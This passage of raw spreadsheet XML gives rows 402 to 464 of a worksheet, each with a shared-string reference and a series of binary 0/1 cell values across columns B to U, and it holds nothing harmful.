      <c r="E402" s="5">
        <v>1</v>
      </c>
      <c r="F402" s="5">
        <v>1</v>
      </c>
      <c r="G402" s="5">
        <v>1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1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7">
        <v>0</v>
      </c>
      <c r="U402" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="403" spans="1:21" ht="45">
      <c r="A403" s="3" t="s">
        <v>402</v>
      </c>
      <c r="B403" s="1">
        <v>0</v>
      </c>
      <c r="C403" s="14">
        <v>0</v>
      </c>
      <c r="D403" s="5">
        <v>0</v>
      </c>
      <c r="E403" s="5">
        <v>1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1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7">
        <v>0</v>
      </c>
      <c r="U403" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="404" spans="1:21" ht="90">
      <c r="A404" s="3" t="s">
        <v>403</v>
      </c>
      <c r="B404" s="1">
        <v>0</v>
      </c>
      <c r="C404" s="1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1</v>
      </c>
      <c r="M404" s="1">
        <v>1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7">
        <v>0</v>
      </c>
      <c r="U404" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="405" spans="1:21">
      <c r="A405" s="3" t="s">
        <v>404</v>
      </c>
      <c r="B405" s="1">
        <v>0</v>
      </c>
      <c r="C405" s="14">
        <v>0</v>
      </c>
      <c r="D405" s="5">
        <v>0</v>
      </c>
      <c r="E405" s="5">
        <v>0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1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7">
        <v>0</v>
      </c>
      <c r="U405" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="406" spans="1:21" ht="90">
      <c r="A406" s="3" t="s">
        <v>405</v>
      </c>
      <c r="B406" s="1">
        <v>0</v>
      </c>
      <c r="C406" s="1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1</v>
      </c>
      <c r="M406" s="1">
        <v>1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7">
        <v>0</v>
      </c>
      <c r="U406" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="407" spans="1:21">
      <c r="A407" s="3" t="s">
        <v>406</v>
      </c>
      <c r="B407" s="1">
        <v>1</v>
      </c>
      <c r="C407" s="14">
        <v>0</v>
      </c>
      <c r="D407" s="5">
        <v>0</v>
      </c>
      <c r="E407" s="5">
        <v>0</v>
      </c>
      <c r="F407" s="5">
        <v>1</v>
      </c>
      <c r="G407" s="5">
        <v>0</v>
      </c>
      <c r="H407" s="5">
        <v>1</v>
      </c>
      <c r="I407" s="5">
        <v>0</v>
      </c>
      <c r="J407" s="5">
        <v>0</v>
      </c>
      <c r="K407" s="5">
        <v>0</v>
      </c>
      <c r="L407" s="5">
        <v>0</v>
      </c>
      <c r="M407" s="1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7">
        <v>0</v>
      </c>
      <c r="U407" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="408" spans="1:21" ht="45">
      <c r="A408" s="3" t="s">
        <v>407</v>
      </c>
      <c r="B408" s="1">
        <v>0</v>
      </c>
      <c r="C408" s="14">
        <v>0</v>
      </c>
      <c r="D408" s="5">
        <v>0</v>
      </c>
      <c r="E408" s="5">
        <v>1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1">
        <v>0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7">
        <v>0</v>
      </c>
      <c r="U408" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="409" spans="1:21" ht="45">
      <c r="A409" s="3" t="s">
        <v>408</v>
      </c>
      <c r="B409" s="1">
        <v>1</v>
      </c>
      <c r="C409" s="14">
        <v>1</v>
      </c>
      <c r="D409" s="5">
        <v>0</v>
      </c>
      <c r="E409" s="5">
        <v>1</v>
      </c>
      <c r="F409" s="5">
        <v>0</v>
      </c>
      <c r="G409" s="5">
        <v>0</v>
      </c>
      <c r="H409" s="5">
        <v>1</v>
      </c>
      <c r="I409" s="5">
        <v>0</v>
      </c>
      <c r="J409" s="5">
        <v>0</v>
      </c>
      <c r="K409" s="5">
        <v>0</v>
      </c>
      <c r="L409" s="5">
        <v>0</v>
      </c>
      <c r="M409" s="1">
        <v>0</v>
      </c>
      <c r="N409" s="14">
        <v>0</v>
      </c>
      <c r="O409" s="14">
        <v>0</v>
      </c>
      <c r="P409" s="14">
        <v>0</v>
      </c>
      <c r="Q409" s="14">
        <v>0</v>
      </c>
      <c r="R409" s="14">
        <v>0</v>
      </c>
      <c r="S409" s="14">
        <v>1</v>
      </c>
      <c r="T409" s="7">
        <v>0</v>
      </c>
      <c r="U409" s="1">
        <v>1</v>
      </c>
    </row>
    <row r="410" spans="1:21" ht="30">
      <c r="A410" s="3" t="s">
        <v>409</v>
      </c>
      <c r="B410" s="1">
        <v>1</v>
      </c>
      <c r="C410" s="14">
        <v>0</v>
      </c>
      <c r="D410" s="5">
        <v>0</v>
      </c>
      <c r="E410" s="5">
        <v>1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1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7">
        <v>1</v>
      </c>
      <c r="U410" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="411" spans="1:21" ht="30">
      <c r="A411" s="3" t="s">
        <v>410</v>
      </c>
      <c r="B411" s="1">
        <v>0</v>
      </c>
      <c r="C411" s="14">
        <v>0</v>
      </c>
      <c r="D411" s="5">
        <v>1</v>
      </c>
      <c r="E411" s="5">
        <v>1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1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7">
        <v>0</v>
      </c>
      <c r="U411" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="412" spans="1:21" ht="30">
      <c r="A412" s="3" t="s">
        <v>411</v>
      </c>
      <c r="B412" s="1">
        <v>1</v>
      </c>
      <c r="C412" s="14">
        <v>0</v>
      </c>
      <c r="D412" s="5">
        <v>0</v>
      </c>
      <c r="E412" s="5">
        <v>1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1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7">
        <v>1</v>
      </c>
      <c r="U412" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="413" spans="1:21">
      <c r="A413" s="3" t="s">
        <v>412</v>
      </c>
      <c r="B413" s="1">
        <v>0</v>
      </c>
      <c r="C413" s="14">
        <v>0</v>
      </c>
      <c r="D413" s="5">
        <v>0</v>
      </c>
      <c r="E413" s="5">
        <v>0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1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7">
        <v>0</v>
      </c>
      <c r="U413" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="414" spans="1:21" ht="30">
      <c r="A414" s="3" t="s">
        <v>413</v>
      </c>
      <c r="B414" s="1">
        <v>1</v>
      </c>
      <c r="C414" s="14">
        <v>0</v>
      </c>
      <c r="D414" s="5">
        <v>0</v>
      </c>
      <c r="E414" s="5">
        <v>1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1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7">
        <v>1</v>
      </c>
      <c r="U414" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="415" spans="1:21" ht="90">
      <c r="A415" s="3" t="s">
        <v>414</v>
      </c>
      <c r="B415" s="1">
        <v>0</v>
      </c>
      <c r="C415" s="1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1</v>
      </c>
      <c r="M415" s="1">
        <v>1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7">
        <v>0</v>
      </c>
      <c r="U415" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="416" spans="1:21" ht="30">
      <c r="A416" s="3" t="s">
        <v>415</v>
      </c>
      <c r="B416" s="1">
        <v>1</v>
      </c>
      <c r="C416" s="1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1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7">
        <v>1</v>
      </c>
      <c r="U416" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="417" spans="1:21">
      <c r="A417" s="3" t="s">
        <v>416</v>
      </c>
      <c r="B417" s="1">
        <v>0</v>
      </c>
      <c r="C417" s="14">
        <v>0</v>
      </c>
      <c r="D417" s="5">
        <v>0</v>
      </c>
      <c r="E417" s="5">
        <v>1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1</v>
      </c>
      <c r="M417" s="1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7">
        <v>0</v>
      </c>
      <c r="U417" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="418" spans="1:21" ht="30">
      <c r="A418" s="3" t="s">
        <v>417</v>
      </c>
      <c r="B418" s="1">
        <v>0</v>
      </c>
      <c r="C418" s="14">
        <v>0</v>
      </c>
      <c r="D418" s="5">
        <v>0</v>
      </c>
      <c r="E418" s="5">
        <v>1</v>
      </c>
      <c r="F418" s="5">
        <v>1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1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7">
        <v>0</v>
      </c>
      <c r="U418" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="419" spans="1:21">
      <c r="A419" s="3" t="s">
        <v>418</v>
      </c>
      <c r="B419" s="1">
        <v>0</v>
      </c>
      <c r="C419" s="14">
        <v>0</v>
      </c>
      <c r="D419" s="5">
        <v>1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1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0</v>
      </c>
      <c r="S419" s="14">
        <v>0</v>
      </c>
      <c r="T419" s="7">
        <v>0</v>
      </c>
      <c r="U419" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="420" spans="1:21" ht="60">
      <c r="A420" s="3" t="s">
        <v>419</v>
      </c>
      <c r="B420" s="1">
        <v>1</v>
      </c>
      <c r="C420" s="14">
        <v>1</v>
      </c>
      <c r="D420" s="5">
        <v>0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0</v>
      </c>
      <c r="K420" s="5">
        <v>0</v>
      </c>
      <c r="L420" s="5">
        <v>0</v>
      </c>
      <c r="M420" s="1">
        <v>0</v>
      </c>
      <c r="N420" s="14">
        <v>1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7">
        <v>0</v>
      </c>
      <c r="U420" s="1">
        <v>1</v>
      </c>
    </row>
    <row r="421" spans="1:21" ht="60">
      <c r="A421" s="3" t="s">
        <v>420</v>
      </c>
      <c r="B421" s="1">
        <v>1</v>
      </c>
      <c r="C421" s="14">
        <v>1</v>
      </c>
      <c r="D421" s="5">
        <v>0</v>
      </c>
      <c r="E421" s="5">
        <v>1</v>
      </c>
      <c r="F421" s="5">
        <v>0</v>
      </c>
      <c r="G421" s="5">
        <v>0</v>
      </c>
      <c r="H421" s="5">
        <v>1</v>
      </c>
      <c r="I421" s="5">
        <v>0</v>
      </c>
      <c r="J421" s="5">
        <v>0</v>
      </c>
      <c r="K421" s="5">
        <v>0</v>
      </c>
      <c r="L421" s="5">
        <v>0</v>
      </c>
      <c r="M421" s="1">
        <v>0</v>
      </c>
      <c r="N421" s="14">
        <v>1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7">
        <v>0</v>
      </c>
      <c r="U421" s="1">
        <v>1</v>
      </c>
    </row>
    <row r="422" spans="1:21" ht="30">
      <c r="A422" s="3" t="s">
        <v>421</v>
      </c>
      <c r="B422" s="1">
        <v>1</v>
      </c>
      <c r="C422" s="1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1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7">
        <v>1</v>
      </c>
      <c r="U422" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="423" spans="1:21" ht="30">
      <c r="A423" s="3" t="s">
        <v>422</v>
      </c>
      <c r="B423" s="1">
        <v>0</v>
      </c>
      <c r="C423" s="1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1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7">
        <v>0</v>
      </c>
      <c r="U423" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="424" spans="1:21" ht="30">
      <c r="A424" s="3" t="s">
        <v>423</v>
      </c>
      <c r="B424" s="1">
        <v>1</v>
      </c>
      <c r="C424" s="14">
        <v>0</v>
      </c>
      <c r="D424" s="5">
        <v>0</v>
      </c>
      <c r="E424" s="5">
        <v>1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1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7">
        <v>1</v>
      </c>
      <c r="U424" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="425" spans="1:21" ht="30">
      <c r="A425" s="3" t="s">
        <v>424</v>
      </c>
      <c r="B425" s="1">
        <v>1</v>
      </c>
      <c r="C425" s="14">
        <v>0</v>
      </c>
      <c r="D425" s="5">
        <v>0</v>
      </c>
      <c r="E425" s="5">
        <v>1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1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7">
        <v>1</v>
      </c>
      <c r="U425" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="426" spans="1:21">
      <c r="A426" s="3" t="s">
        <v>425</v>
      </c>
      <c r="B426" s="1">
        <v>1</v>
      </c>
      <c r="C426" s="14">
        <v>0</v>
      </c>
      <c r="D426" s="5">
        <v>0</v>
      </c>
      <c r="E426" s="5">
        <v>0</v>
      </c>
      <c r="F426" s="5">
        <v>1</v>
      </c>
      <c r="G426" s="5">
        <v>0</v>
      </c>
      <c r="H426" s="5">
        <v>1</v>
      </c>
      <c r="I426" s="5">
        <v>0</v>
      </c>
      <c r="J426" s="5">
        <v>0</v>
      </c>
      <c r="K426" s="5">
        <v>0</v>
      </c>
      <c r="L426" s="5">
        <v>0</v>
      </c>
      <c r="M426" s="1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7">
        <v>0</v>
      </c>
      <c r="U426" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="427" spans="1:21">
      <c r="A427" s="3" t="s">
        <v>426</v>
      </c>
      <c r="B427" s="1">
        <v>0</v>
      </c>
      <c r="C427" s="14">
        <v>0</v>
      </c>
      <c r="D427" s="5">
        <v>0</v>
      </c>
      <c r="E427" s="5">
        <v>0</v>
      </c>
      <c r="F427" s="5">
        <v>1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1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7">
        <v>0</v>
      </c>
      <c r="U427" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="428" spans="1:21">
      <c r="A428" s="3" t="s">
        <v>427</v>
      </c>
      <c r="B428" s="1">
        <v>1</v>
      </c>
      <c r="C428" s="14">
        <v>0</v>
      </c>
      <c r="D428" s="5">
        <v>0</v>
      </c>
      <c r="E428" s="5">
        <v>1</v>
      </c>
      <c r="F428" s="5">
        <v>1</v>
      </c>
      <c r="G428" s="5">
        <v>0</v>
      </c>
      <c r="H428" s="5">
        <v>1</v>
      </c>
      <c r="I428" s="5">
        <v>0</v>
      </c>
      <c r="J428" s="5">
        <v>0</v>
      </c>
      <c r="K428" s="5">
        <v>0</v>
      </c>
      <c r="L428" s="5">
        <v>0</v>
      </c>
      <c r="M428" s="1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7">
        <v>0</v>
      </c>
      <c r="U428" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="429" spans="1:21">
      <c r="A429" s="3" t="s">
        <v>428</v>
      </c>
      <c r="B429" s="1">
        <v>1</v>
      </c>
      <c r="C429" s="1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1">
        <v>0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7">
        <v>0</v>
      </c>
      <c r="U429" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="430" spans="1:21" ht="45">
      <c r="A430" s="3" t="s">
        <v>429</v>
      </c>
      <c r="B430" s="1">
        <v>1</v>
      </c>
      <c r="C430" s="14">
        <v>1</v>
      </c>
      <c r="D430" s="5">
        <v>0</v>
      </c>
      <c r="E430" s="5">
        <v>1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1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7">
        <v>1</v>
      </c>
      <c r="U430" s="1">
        <v>1</v>
      </c>
    </row>
    <row r="431" spans="1:21" ht="45">
      <c r="A431" s="3" t="s">
        <v>430</v>
      </c>
      <c r="B431" s="1">
        <v>0</v>
      </c>
      <c r="C431" s="1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1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7">
        <v>0</v>
      </c>
      <c r="U431" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="432" spans="1:21" ht="45">
      <c r="A432" s="3" t="s">
        <v>431</v>
      </c>
      <c r="B432" s="1">
        <v>1</v>
      </c>
      <c r="C432" s="14">
        <v>0</v>
      </c>
      <c r="D432" s="5">
        <v>0</v>
      </c>
      <c r="E432" s="5">
        <v>0</v>
      </c>
      <c r="F432" s="5">
        <v>1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1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7">
        <v>0</v>
      </c>
      <c r="U432" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="433" spans="1:21">
      <c r="A433" s="3" t="s">
        <v>432</v>
      </c>
      <c r="B433" s="1">
        <v>1</v>
      </c>
      <c r="C433" s="1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1</v>
      </c>
      <c r="I433" s="5">
        <v>0</v>
      </c>
      <c r="J433" s="5">
        <v>0</v>
      </c>
      <c r="K433" s="5">
        <v>0</v>
      </c>
      <c r="L433" s="5">
        <v>0</v>
      </c>
      <c r="M433" s="1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7">
        <v>0</v>
      </c>
      <c r="U433" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="434" spans="1:21">
      <c r="A434" s="3" t="s">
        <v>433</v>
      </c>
      <c r="B434" s="1">
        <v>1</v>
      </c>
      <c r="C434" s="1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1</v>
      </c>
      <c r="I434" s="5">
        <v>0</v>
      </c>
      <c r="J434" s="5">
        <v>0</v>
      </c>
      <c r="K434" s="5">
        <v>0</v>
      </c>
      <c r="L434" s="5">
        <v>0</v>
      </c>
      <c r="M434" s="1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7">
        <v>0</v>
      </c>
      <c r="U434" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="435" spans="1:21" ht="45">
      <c r="A435" s="3" t="s">
        <v>434</v>
      </c>
      <c r="B435" s="1">
        <v>0</v>
      </c>
      <c r="C435" s="14">
        <v>0</v>
      </c>
      <c r="D435" s="5">
        <v>0</v>
      </c>
      <c r="E435" s="5">
        <v>1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1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7">
        <v>0</v>
      </c>
      <c r="U435" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="436" spans="1:21">
      <c r="A436" s="3" t="s">
        <v>435</v>
      </c>
      <c r="B436" s="1">
        <v>0</v>
      </c>
      <c r="C436" s="14">
        <v>0</v>
      </c>
      <c r="D436" s="5">
        <v>1</v>
      </c>
      <c r="E436" s="5">
        <v>1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1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7">
        <v>0</v>
      </c>
      <c r="U436" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="437" spans="1:21">
      <c r="A437" s="3" t="s">
        <v>436</v>
      </c>
      <c r="B437" s="1">
        <v>1</v>
      </c>
      <c r="C437" s="14">
        <v>0</v>
      </c>
      <c r="D437" s="5">
        <v>0</v>
      </c>
      <c r="E437" s="5">
        <v>0</v>
      </c>
      <c r="F437" s="5">
        <v>1</v>
      </c>
      <c r="G437" s="5">
        <v>1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1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7">
        <v>0</v>
      </c>
      <c r="U437" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="438" spans="1:21" ht="30">
      <c r="A438" s="3" t="s">
        <v>437</v>
      </c>
      <c r="B438" s="1">
        <v>1</v>
      </c>
      <c r="C438" s="14">
        <v>1</v>
      </c>
      <c r="D438" s="5">
        <v>0</v>
      </c>
      <c r="E438" s="5">
        <v>0</v>
      </c>
      <c r="F438" s="5">
        <v>1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1">
        <v>0</v>
      </c>
      <c r="N438" s="14">
        <v>0</v>
      </c>
      <c r="O438" s="14">
        <v>0</v>
      </c>
      <c r="P438" s="14">
        <v>0</v>
      </c>
      <c r="Q438" s="14">
        <v>1</v>
      </c>
      <c r="R438" s="14">
        <v>0</v>
      </c>
      <c r="S438" s="14">
        <v>0</v>
      </c>
      <c r="T438" s="7">
        <v>0</v>
      </c>
      <c r="U438" s="1">
        <v>1</v>
      </c>
    </row>
    <row r="439" spans="1:21" ht="30">
      <c r="A439" s="3" t="s">
        <v>438</v>
      </c>
      <c r="B439" s="1">
        <v>1</v>
      </c>
      <c r="C439" s="14">
        <v>0</v>
      </c>
      <c r="D439" s="5">
        <v>0</v>
      </c>
      <c r="E439" s="5">
        <v>0</v>
      </c>
      <c r="F439" s="5">
        <v>1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1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7">
        <v>1</v>
      </c>
      <c r="U439" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="440" spans="1:21" ht="90">
      <c r="A440" s="3" t="s">
        <v>439</v>
      </c>
      <c r="B440" s="1">
        <v>0</v>
      </c>
      <c r="C440" s="1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1">
        <v>1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7">
        <v>0</v>
      </c>
      <c r="U440" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="441" spans="1:21">
      <c r="A441" s="3" t="s">
        <v>440</v>
      </c>
      <c r="B441" s="1">
        <v>1</v>
      </c>
      <c r="C441" s="1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1</v>
      </c>
      <c r="I441" s="5">
        <v>0</v>
      </c>
      <c r="J441" s="5">
        <v>0</v>
      </c>
      <c r="K441" s="5">
        <v>0</v>
      </c>
      <c r="L441" s="5">
        <v>0</v>
      </c>
      <c r="M441" s="1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7">
        <v>0</v>
      </c>
      <c r="U441" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="442" spans="1:21">
      <c r="A442" s="3" t="s">
        <v>441</v>
      </c>
      <c r="B442" s="1">
        <v>0</v>
      </c>
      <c r="C442" s="14">
        <v>0</v>
      </c>
      <c r="D442" s="5">
        <v>0</v>
      </c>
      <c r="E442" s="5">
        <v>0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5">
        <v>0</v>
      </c>
      <c r="M442" s="1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7">
        <v>0</v>
      </c>
      <c r="U442" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="443" spans="1:21">
      <c r="A443" s="3" t="s">
        <v>442</v>
      </c>
      <c r="B443" s="1">
        <v>0</v>
      </c>
      <c r="C443" s="14">
        <v>0</v>
      </c>
      <c r="D443" s="5">
        <v>0</v>
      </c>
      <c r="E443" s="5">
        <v>1</v>
      </c>
      <c r="F443" s="5">
        <v>1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1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7">
        <v>0</v>
      </c>
      <c r="U443" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="444" spans="1:21" ht="45">
      <c r="A444" s="3" t="s">
        <v>443</v>
      </c>
      <c r="B444" s="1">
        <v>1</v>
      </c>
      <c r="C444" s="14">
        <v>1</v>
      </c>
      <c r="D444" s="5">
        <v>0</v>
      </c>
      <c r="E444" s="5">
        <v>1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1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7">
        <v>0</v>
      </c>
      <c r="U444" s="1">
        <v>1</v>
      </c>
    </row>
    <row r="445" spans="1:21" ht="30">
      <c r="A445" s="3" t="s">
        <v>444</v>
      </c>
      <c r="B445" s="1">
        <v>1</v>
      </c>
      <c r="C445" s="14">
        <v>1</v>
      </c>
      <c r="D445" s="5">
        <v>0</v>
      </c>
      <c r="E445" s="5">
        <v>1</v>
      </c>
      <c r="F445" s="5">
        <v>0</v>
      </c>
      <c r="G445" s="5">
        <v>0</v>
      </c>
      <c r="H445" s="5">
        <v>1</v>
      </c>
      <c r="I445" s="5">
        <v>0</v>
      </c>
      <c r="J445" s="5">
        <v>0</v>
      </c>
      <c r="K445" s="5">
        <v>0</v>
      </c>
      <c r="L445" s="5">
        <v>0</v>
      </c>
      <c r="M445" s="1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7">
        <v>0</v>
      </c>
      <c r="U445" s="1">
        <v>1</v>
      </c>
    </row>
    <row r="446" spans="1:21" ht="30">
      <c r="A446" s="3" t="s">
        <v>445</v>
      </c>
      <c r="B446" s="1">
        <v>1</v>
      </c>
      <c r="C446" s="1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1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7">
        <v>0</v>
      </c>
      <c r="U446" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="447" spans="1:21">
      <c r="A447" s="3" t="s">
        <v>446</v>
      </c>
      <c r="B447" s="1">
        <v>1</v>
      </c>
      <c r="C447" s="14">
        <v>0</v>
      </c>
      <c r="D447" s="5">
        <v>0</v>
      </c>
      <c r="E447" s="5">
        <v>0</v>
      </c>
      <c r="F447" s="5">
        <v>1</v>
      </c>
      <c r="G447" s="5">
        <v>1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1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7">
        <v>0</v>
      </c>
      <c r="U447" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="448" spans="1:21" ht="30">
      <c r="A448" s="3" t="s">
        <v>447</v>
      </c>
      <c r="B448" s="1">
        <v>1</v>
      </c>
      <c r="C448" s="14">
        <v>1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1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7">
        <v>0</v>
      </c>
      <c r="U448" s="1">
        <v>1</v>
      </c>
    </row>
    <row r="449" spans="1:21" ht="30">
      <c r="A449" s="3" t="s">
        <v>448</v>
      </c>
      <c r="B449" s="1">
        <v>1</v>
      </c>
      <c r="C449" s="14">
        <v>1</v>
      </c>
      <c r="D449" s="5">
        <v>0</v>
      </c>
      <c r="E449" s="5">
        <v>1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1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7">
        <v>0</v>
      </c>
      <c r="U449" s="1">
        <v>1</v>
      </c>
    </row>
    <row r="450" spans="1:21" ht="30">
      <c r="A450" s="3" t="s">
        <v>449</v>
      </c>
      <c r="B450" s="1">
        <v>1</v>
      </c>
      <c r="C450" s="1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1</v>
      </c>
      <c r="I450" s="5">
        <v>0</v>
      </c>
      <c r="J450" s="5">
        <v>0</v>
      </c>
      <c r="K450" s="5">
        <v>0</v>
      </c>
      <c r="L450" s="5">
        <v>0</v>
      </c>
      <c r="M450" s="1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7">
        <v>0</v>
      </c>
      <c r="U450" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="451" spans="1:21">
      <c r="A451" s="3" t="s">
        <v>450</v>
      </c>
      <c r="B451" s="1">
        <v>0</v>
      </c>
      <c r="C451" s="14">
        <v>0</v>
      </c>
      <c r="D451" s="5">
        <v>0</v>
      </c>
      <c r="E451" s="5">
        <v>0</v>
      </c>
      <c r="F451" s="5">
        <v>1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1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7">
        <v>0</v>
      </c>
      <c r="U451" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="452" spans="1:21" ht="30">
      <c r="A452" s="3" t="s">
        <v>451</v>
      </c>
      <c r="B452" s="1">
        <v>1</v>
      </c>
      <c r="C452" s="14">
        <v>0</v>
      </c>
      <c r="D452" s="5">
        <v>0</v>
      </c>
      <c r="E452" s="5">
        <v>1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1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7">
        <v>1</v>
      </c>
      <c r="U452" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="453" spans="1:21" ht="45">
      <c r="A453" s="3" t="s">
        <v>452</v>
      </c>
      <c r="B453" s="1">
        <v>1</v>
      </c>
      <c r="C453" s="14">
        <v>1</v>
      </c>
      <c r="D453" s="5">
        <v>0</v>
      </c>
      <c r="E453" s="5">
        <v>0</v>
      </c>
      <c r="F453" s="5">
        <v>0</v>
      </c>
      <c r="G453" s="5">
        <v>0</v>
      </c>
      <c r="H453" s="5">
        <v>1</v>
      </c>
      <c r="I453" s="5">
        <v>0</v>
      </c>
      <c r="J453" s="5">
        <v>0</v>
      </c>
      <c r="K453" s="5">
        <v>0</v>
      </c>
      <c r="L453" s="5">
        <v>0</v>
      </c>
      <c r="M453" s="1">
        <v>0</v>
      </c>
      <c r="N453" s="14">
        <v>0</v>
      </c>
      <c r="O453" s="14">
        <v>0</v>
      </c>
      <c r="P453" s="14">
        <v>0</v>
      </c>
      <c r="Q453" s="14">
        <v>1</v>
      </c>
      <c r="R453" s="14">
        <v>0</v>
      </c>
      <c r="S453" s="14">
        <v>0</v>
      </c>
      <c r="T453" s="7">
        <v>0</v>
      </c>
      <c r="U453" s="1">
        <v>1</v>
      </c>
    </row>
    <row r="454" spans="1:21" ht="30">
      <c r="A454" s="3" t="s">
        <v>453</v>
      </c>
      <c r="B454" s="1">
        <v>1</v>
      </c>
      <c r="C454" s="14">
        <v>0</v>
      </c>
      <c r="D454" s="5">
        <v>0</v>
      </c>
      <c r="E454" s="5">
        <v>1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1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7">
        <v>1</v>
      </c>
      <c r="U454" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="455" spans="1:21" ht="30">
      <c r="A455" s="3" t="s">
        <v>454</v>
      </c>
      <c r="B455" s="1">
        <v>0</v>
      </c>
      <c r="C455" s="14">
        <v>1</v>
      </c>
      <c r="D455" s="5">
        <v>0</v>
      </c>
      <c r="E455" s="5">
        <v>1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1</v>
      </c>
      <c r="L455" s="5">
        <v>0</v>
      </c>
      <c r="M455" s="1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7">
        <v>0</v>
      </c>
      <c r="U455" s="1">
        <v>1</v>
      </c>
    </row>
    <row r="456" spans="1:21" ht="90">
      <c r="A456" s="3" t="s">
        <v>455</v>
      </c>
      <c r="B456" s="1">
        <v>0</v>
      </c>
      <c r="C456" s="1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1</v>
      </c>
      <c r="M456" s="1">
        <v>1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7">
        <v>0</v>
      </c>
      <c r="U456" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="457" spans="1:21" ht="30">
      <c r="A457" s="3" t="s">
        <v>456</v>
      </c>
      <c r="B457" s="1">
        <v>1</v>
      </c>
      <c r="C457" s="14">
        <v>0</v>
      </c>
      <c r="D457" s="5">
        <v>0</v>
      </c>
      <c r="E457" s="5">
        <v>1</v>
      </c>
      <c r="F457" s="5">
        <v>1</v>
      </c>
      <c r="G457" s="5">
        <v>0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1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7">
        <v>0</v>
      </c>
      <c r="U457" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="458" spans="1:21">
      <c r="A458" s="3" t="s">
        <v>457</v>
      </c>
      <c r="B458" s="1">
        <v>1</v>
      </c>
      <c r="C458" s="1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1</v>
      </c>
      <c r="I458" s="5">
        <v>0</v>
      </c>
      <c r="J458" s="5">
        <v>0</v>
      </c>
      <c r="K458" s="5">
        <v>0</v>
      </c>
      <c r="L458" s="5">
        <v>0</v>
      </c>
      <c r="M458" s="1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7">
        <v>0</v>
      </c>
      <c r="U458" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="459" spans="1:21">
      <c r="A459" s="3" t="s">
        <v>458</v>
      </c>
      <c r="B459" s="1">
        <v>0</v>
      </c>
      <c r="C459" s="14">
        <v>0</v>
      </c>
      <c r="D459" s="5">
        <v>0</v>
      </c>
      <c r="E459" s="5">
        <v>1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1</v>
      </c>
      <c r="M459" s="1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7">
        <v>0</v>
      </c>
      <c r="U459" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="460" spans="1:21" ht="90">
      <c r="A460" s="3" t="s">
        <v>459</v>
      </c>
      <c r="B460" s="1">
        <v>0</v>
      </c>
      <c r="C460" s="1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1</v>
      </c>
      <c r="M460" s="1">
        <v>1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7">
        <v>0</v>
      </c>
      <c r="U460" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="461" spans="1:21">
      <c r="A461" s="3" t="s">
        <v>460</v>
      </c>
      <c r="B461" s="1">
        <v>1</v>
      </c>
      <c r="C461" s="14">
        <v>0</v>
      </c>
      <c r="D461" s="5">
        <v>0</v>
      </c>
      <c r="E461" s="5">
        <v>0</v>
      </c>
      <c r="F461" s="5">
        <v>1</v>
      </c>
      <c r="G461" s="5">
        <v>1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1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7">
        <v>0</v>
      </c>
      <c r="U461" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="462" spans="1:21">
      <c r="A462" s="3" t="s">
        <v>461</v>
      </c>
      <c r="B462" s="1">
        <v>0</v>
      </c>
      <c r="C462" s="14">
        <v>0</v>
      </c>
      <c r="D462" s="5">
        <v>0</v>
      </c>
      <c r="E462" s="5">
        <v>0</v>
      </c>
      <c r="F462" s="5">
        <v>1</v>
      </c>
      <c r="G462" s="5">
        <v>1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1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7">
        <v>0</v>
      </c>
      <c r="U462" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="463" spans="1:21">
      <c r="A463" s="3" t="s">
        <v>462</v>
      </c>
      <c r="B463" s="1">
        <v>0</v>
      </c>
      <c r="C463" s="14">
        <v>0</v>
      </c>
      <c r="D463" s="5">
        <v>0</v>
      </c>
      <c r="E463" s="5">
        <v>0</v>
      </c>
      <c r="F463" s="5">
        <v>1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1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7">
        <v>0</v>
      </c>
      <c r="U463" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="464" spans="1:21" ht="30">
      <c r="A464" s="3" t="s">
        <v>463</v>
      </c>
      <c r="B464" s="1">
        <v>1</v>
      </c>
      <c r="C464" s="14">
        <v>0</v>
      </c>
      <c r="D464" s="5">
        <v>0</v>
      </c>
      <c r="E464" s="5">
        <v>1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1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7">
        <v>1</v>
      </c>
      <c r="U464" s="1">
        <v>0</v>
      </c>
    </row>
